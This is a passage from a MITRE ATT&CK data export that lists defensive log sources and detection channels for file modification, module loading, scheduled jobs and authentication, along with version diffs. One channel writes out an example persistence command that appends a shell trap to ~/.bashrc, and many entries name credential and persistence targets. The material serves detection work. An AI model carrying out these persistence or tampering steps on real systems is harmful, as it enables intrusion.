                            "name": "auditd:SYSCALL",
                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File modification in /etc/paths.d or user shell rc files"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "/var/log/install.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=2"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "query: Enumeration of root certificates showing unexpected additions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write of .service unit files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write/unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loginwindow or desktopservices modified settings or files"
                        },
                        {
                            "name": "ESXiLogs:messages",
                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write, rename"
                        },
                        {
                            "name": "containerd:runtime",
                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "/etc/passwd or /etc/group file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SecurityAgentPlugins modification"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "boot"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
                        },
                        {
                            "name": "fs:filesystem",
                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
                        },
                        {
                            "name": "macos:auth",
                            "channel": "~/.ssh/authorized_keys"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "compute.instances.setMetadata"
                        },
                        {
                            "name": "azure:resource",
                            "channel": "PATCH vm/authorized_keys"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "file write or edit"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "rename"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "file_write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "unlink, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "replace existing dylibs"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
                        },
                        {
                            "name": "firmware:update",
                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
                        },
                        {
                            "name": "IntegrityCheck:ImageValidation",
                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "File modifications in ~/Library/Preferences/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /etc/pam.d/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modifications to Mail.app plist files controlling message rules"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write: Modification of structured stored data by suspicious processes"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected log entries or malformed SQL operations in databases"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Unexpected creation or modification of stored data files in protected directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat, write, rename, unlink"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "rename .vmdk to .*.locked|datastore write spike"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modified application plist or binary replacement in /Applications"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "admin command usage"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "startup-config"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File creation or overwrite in common web-hosting folders"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
                        },
                        {
                            "name": "fs:plist",
                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of existing .service file"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
                        },
                        {
                            "name": "networkconfig",
                            "channel": "unexpected OS image file upload or modification events"
                        },
                        {
                            "name": "network:runtime",
                            "channel": "checksum or runtime memory verification failures"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "rename,chmod"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "create/write/rename under user-writable paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of crontab or local.sh entries"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration file modified or replaced on network device"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Plist modifications containing virtualization run configurations"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file access to /usr/lib/cron/at and job execution path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "binary modified or replaced"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "binary or module replacement event"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
                        },
                        {
                            "name": "networkdevice:firmware",
                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, write, create, open"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "Extensions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, write: File writes to application binaries or libraries at runtime"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file write operations in /Library/WebServer/Documents"
                        },
                        {
                            "name": "fs:launchdaemons",
                            "channel": "file_modify"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "modification of existing LaunchAgents plist"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "create/modify dylib in monitored directories"
                        },
                        {
                            "name": "WinEventLog:CodeIntegrity",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write operation on /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
                        },
                        {
                            "name": "networkdevice:audit",
                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mount or losetup commands creating hidden or encrypted FS"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Hidden volume attachment or modification events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious plist edits for volume mounting behavior"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file writes"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "OfficeTelemetry or DLP"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Access Logging"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
                        },
                        {
                            "name": "FirmwareLogs:Update",
                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Anomalous editing of invoice or payment document templates"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "truncate, unlink, write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
                        },
                        {
                            "name": "linux:fim",
                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "write, rename"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
                        },
                        {
                            "name": "sysdig:file",
                            "channel": "evt.type=write"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "rule definitions written to emond rule plists"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
                        },
                        {
                            "name": "FileIntegrity:ImageValidation",
                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file write to launchd plist paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "modification of entrypoint scripts or init containers"
                        },
                        {
                            "name": "fs:plist_monitoring",
                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/write syscalls targeting web directory files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Terminal/Editor processes modifying web folder"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "AndroidLogs:FileSystem",
                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 16:41:53.549000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][144]\": {\"name\": \"AndroidLogs:FileSystem\", \"channel\": \"Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts\"}, \"root['x_mitre_log_sources'][145]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents\"}, \"root['x_mitre_log_sources'][146]\": {\"name\": \"android:logcat\", \"channel\": \"INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change\"}, \"root['x_mitre_log_sources'][147]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event\"}, \"root['x_mitre_log_sources'][148]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history\"}, \"root['x_mitre_log_sources'][149]\": {\"name\": \"auditd:PATH\", \"channel\": \"odification of ~/.ssh/authorized_keys or credential files\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-01-29 17:21:27.873000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0016",
                            "external_id": "DC0016"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Module Load",
                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Module",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "ETW:LoadImage",
                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dyld/unified log entries indicating image load from non-system paths"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "LD_PRELOAD Logging"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Dynamic Linking State"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DYLD event subsystem"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Process linked with libcrypto.so making external connections"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process execution events with dylib load activity"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=7"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process memory maps new dylib (dylib_load event)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Dylib loaded from abnormal location"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3033"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=3063"
                        },
                        {
                            "name": "auditd:MMAP",
                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "mmap"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "unexpected module load"
                        },
                        {
                            "name": "snmp:status",
                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "module load"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "delay/sleep library usage in user context"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kmod"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.kextd"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "loading of unexpected dylibs compared to historical baselines"
                        },
                        {
                            "name": "auditd:file-events",
                            "channel": "open of suspicious .so from non-standard paths"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "dmesg"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "module load or memory map path"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launch and dylib load"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Processes linked with libssl/libcrypto performing network activity"
                        },
                        {
                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:21:27.873000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0016\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0016\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][39]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file\"}, \"root['x_mitre_log_sources'][40]\": {\"name\": \"android:logcat\", \"channel\": \"Short burst of file I/O followed by JNI/dlopen of a newly created .so\"}, \"root['x_mitre_log_sources'][41]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"dyld: dlopen/dyld_cache load from non-standard app-writable path\"}, \"root['x_mitre_log_sources'][42]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload\"}, \"root['x_mitre_log_sources'][43]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"dlopen/image load from app-writable path (tmp, Caches) outside bundled resources\"}, \"root['x_mitre_log_sources'][44]\": {\"name\": \"android:logcat\", \"channel\": \"DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-09 17:05:23.355000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0001",
                            "external_id": "DC0001"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Scheduled Job Creation",
                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Scheduled Job",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4698"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Execution of non-standard script or binary by cron"
                        },
                        {
                            "name": "WinEventLog:TaskScheduler",
                            "channel": "EventCode=106"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "crontab, systemd_timers"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd_jobs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Startup script and task execution logs"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "verb=create, resource=cronjobs, group=batch"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process: crontab edits, launch of cron job"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events - cron, launchd"
                        },
                        {
                            "name": "esxi:cron",
                            "channel": "execution of scheduled job"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "task creation events"
                        },
                        {
                            "name": "macos:cron",
                            "channel": "cron/launchd"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4699"
                        },
                        {
                            "name": "linux:cron",
                            "channel": "Scheduled execution of unknown or unusual script/binary"
                        },
                        {
                            "name": "MobiledEDR:telemetry",
                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:05:23.355000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/data-components/DC0001\", \"old_value\": \"https://attack.mitre.org/datacomponents/DC0001\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][16]\": {\"name\": \"MobiledEDR:telemetry\", \"channel\": \"Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.271000+00:00",
                    "modified": "2026-04-24 19:47:33.610000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0002",
                            "external_id": "DC0002"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "User Account Authentication",
                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "auditd:AUTH",
                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "pam_authenticate, sshd"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
                        },
                        {
                            "name": "auditd:USER_LOGIN",
                            "channel": "USER_AUTH"
                        },
                        {
